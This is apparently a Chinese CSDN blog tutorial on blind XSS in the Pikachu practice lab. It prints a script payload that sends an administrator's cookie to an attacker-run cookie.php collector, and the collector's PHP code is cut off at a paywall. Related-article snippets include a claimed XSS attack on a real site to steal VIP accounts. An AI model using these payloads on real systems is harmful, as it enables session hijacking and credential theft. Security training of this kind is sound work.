xss盲打(通过xss盲打盗取管理员账号和密码!)

最新推荐文章于 2024-08-14 16:24:24 发布
最新推荐文章于 2024-08-14 16:24:24 发布
阅读量6.6k 收藏 32
点赞数 7
分类专栏: 我的笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43814486/article/details/89789889
版权
本文介绍了XSS盲打的概念,虽然看不到直接效果,但只要payload执行即表明存在漏洞。通过构造特定payload,可以将管理员的cookie信息发送到攻击者的数据库,从而获取管理员的账号和密码。经过过程展示,成功盗取了admin账号和其MD5加密后的密码。
摘要由CSDN通过智能技术生成

原理:

其实和存储型的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞!

上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下:

1,我输入的payload:

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

这个payload的意思就是带着cookie的值访问cookie.php。这个cookie.php如下:

<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//这个是获取cookie的api页面

if(isset($_GET['cookie'])){
    $time=date('Y-m-d g:i:s');
    $ipaddress=getenv ('REMOTE_ADDR');
    $cookie=$_GET['cookie'];
    $referer=$_SERVER['HTTP_REFER
最低0.47元/天 解锁文章
老-男孩
关注
专栏目录
服务器搭建XSS盲打平台,绕坑
CC__Faker的博客
05-07 1506
文章目录环境介绍环境搭建平台搭建平台使用 环境介绍 本次搭建环境采用的是ubuntu20,php,apache2,无需数据库 XSS平台项目名称:BlueLotus_XSSReceiver 项目地址:https://github.com/trysec/BlueLotus_XSSReceiver 环境搭建 sudo apt update 更新源 sudo apt install apache2 安装apache sudo systemctl status apache2 查看apac
网络安全学习:渗透测试钓鱼案例,夯实基础
kali_Ma的博客
09-02 2599
简介 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 名言: 你对这行的兴趣,决定你在这行的成就! 2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>戳我拿<一 一、前言 网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、
首次成功实施 XSS 攻击,盗取目标网站大量 VIP 帐号
weixin_34111790的博客
06-30 174
前言 之前做网站时有做代码防御 XSS(Cross Site Script) 攻击,但是却只处于了解的阶段,并不知道其中具体的原理,更别说使用了。最近有朋友要求我帮助他 Hack 一个网站,达到一定的目的。思考来思考去,最后想了一套方案,并最终成功实施。现在回想起来,整套解决方案中,其实主要就是 XSS。 (   本文不会公布目标网站地址。主要是为了交流技术,以帮助大家在 Web 开发中更...
XSS盲打与cookie劫持
最新发布
m0_74249600的博客
08-14 946
本文紧接上篇文章讲述了XSS盲打、cookie劫持以及靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
php截获用户明文密码,【超详细入门教程】通过xss获取管理员明文账号密码
weixin_34533343的博客
03-16 385
本帖最后由 说书人 于 2019-12-17 03:56 编辑0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了...
反射性xss的简单利用(获取账号密码
m0_46317063的博客
07-06 440
反射性XSS的利用(获取账号密码
xss攻击之盗取账号
zhangzhangdan的博客
07-17 5134
XSS攻击:跨站脚本攻击(Cross Site Scripting),是一种用javascript脚本写的攻击方式 一般测试,我们会在运行的一段代码中写入一段javascript代码,在程序运行的的时候它会显示出来: &lt;?php public function index() { $str = "&lt;sctipt&gt;alert('aa')&lt;script&gt;"; ...
渗透测试-xss漏洞之反射型(post)获取用户密码
lza20001103的博客
04-24 3687
xss之反射型(post)获取用户密码
XSS盲打演示和讲解;XSS绕过思路讲解和案例演示;XSS绕过关于htmlspecialchars()函数;XSS常见防范措施
qq_44696653的博客
05-04 887
XSS盲打演示和讲解 当只有后台会看到前端输入的内容而前端无法判断是否存在XSS时,我们可以插入XSS代码。这个时候由于后端的安全考虑往往不会很严格,所以当管理员登陆的时候就会被X。 在pikachu上具体的实验演示; 1.在XSS盲打模块根据前端的提示输入相关信息,发现输入的信息只会反馈给后台,在前端无法显示。这里就可以不管别的直接输入跨站脚本的内容 例如:<script>alert...
【网络安全】XSS盲打实战案例:某网页漫画
HBohan的博客
01-18 2412
"XSS盲打"是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的XSS攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发XSS来实现攻击者预定好的“真实攻击功能”。
Python-JShell用XSS获取一个JavaScriptshell
08-10
JShell - 用XSS获取一个JavaScript shell
XSS漏洞(获取键盘记录,XSS盲打XSS防御过滤)
m0_65077299的博客
12-20 193
XSS漏洞(获取键盘记录,XSS盲打XSS防御过滤)
XSS盗取用户信息
qq_43776408的博客
07-27 991
盗取用户信息原理 类似于你要登QQ 我给你一个链接 你点开这个链接登录 你的用户名和密码都保存在这个链接所对应的服务器上 就不是官方服务器上了 setookit工具克隆网站 直接kali中输入setookit 假设win的IP地址为0.100 我们准备克隆下面的网站 192.168.0.100/dvwa/login.php 然后kali中的setookit中有很多选项 1231确定 下图你可以看到使用的是kali默认的IP0.104 然后再Enter the url后输入你想要克隆的网站URL 就刚才
[典型漏洞分享]一个典型的XSS盲打漏洞可导致全网用户cookie被盗取
weixin_30352645的博客
12-28 254
偶平时在做安全测试时,一般是以发现问题为主,点到为止,但做安全的同学可能也遇到过这样的问题,当你尝试向开发的同学描述一个漏洞危害怎么怎么样的时候,双方经常会有一种鸡同鸭讲的感觉,甚至他们觉得我们在夸大其词去影响他们去修复,其实面对开发的同学的质疑,我也觉得合理,毕竟你用XSS去弹个框,能说明什么呢?因此,本案例着偏重渗透的过程,目的是通过一个案例来解决以后鸡同鸭讲的局面,同时也能树立...
网络安全之从原理看懂XSS
Galaxy_0的博客
01-18 1560
网络安全之从原理看懂XSS
【漏洞学习——XSS】金蝶商城xss盲打
Fly_鹏程万里
02-22 426
地址:http://mall.kingdee.com/cart.action 1、三处小的xss (鸡肋) 2、一处反射型的xss, 位于商城主页的搜索处(鸡肋) http://mall.kingdee.com/search.action?k=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E 3、后台盲打组织成员(较严重) 注册了两个帐号...
php脚本暴力破解网站密码(附php源代码)
wangqun11的博客
12-30 1827
有一种网站,没有验证码;有一种网站,你可以利用某种手段获取到登陆者的用户名(比如邮箱啦等等,用户名你是知道的),你所不知道的仅仅是登录密码,有没有什么方法可以破解呢? 我们单位有一个内网(虽是内网,但有时在家也可以登录),用户名可以搞到,密码原始是六位的数字(其实大多数人都没有修改过),而且牛叉的是,这个网站登录时,如果输入错误次数过多也不会让你输入验证码,这太好了,心中窃喜...
写一个python脚本检测pikachu靶场的xss盲打
06-03
好的,下面是一个简单的 Python 脚本,用于检测 pikachu 靶场的 XSS 盲打漏洞。 ```python import requests # 构造请求 url = "http://your-pikachu-url.com/vulnerabilities/xss_s/" payload = "<script>alert('xss vulnerable')</script>" cookies = {"security": "low"} response = requests.post(url, data={"txtName": payload}, cookies=cookies) # 判断是否存在漏洞 if payload in response.text: print("XSS 漏洞存在!") else: print("未发现 XSS 漏洞。") ``` 你需要将 `url` 替换为你自己的 pikachu 靶场的 URL,然后运行脚本即可。脚本会构造一个包含 XSS 代码的 POST 请求,然后判断响应中是否包含这个代码,如果包含则说明存在漏洞。 当然,这只是一个简单的示例脚本,实际使用中可能需要根据具体情况进行修改和完善。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值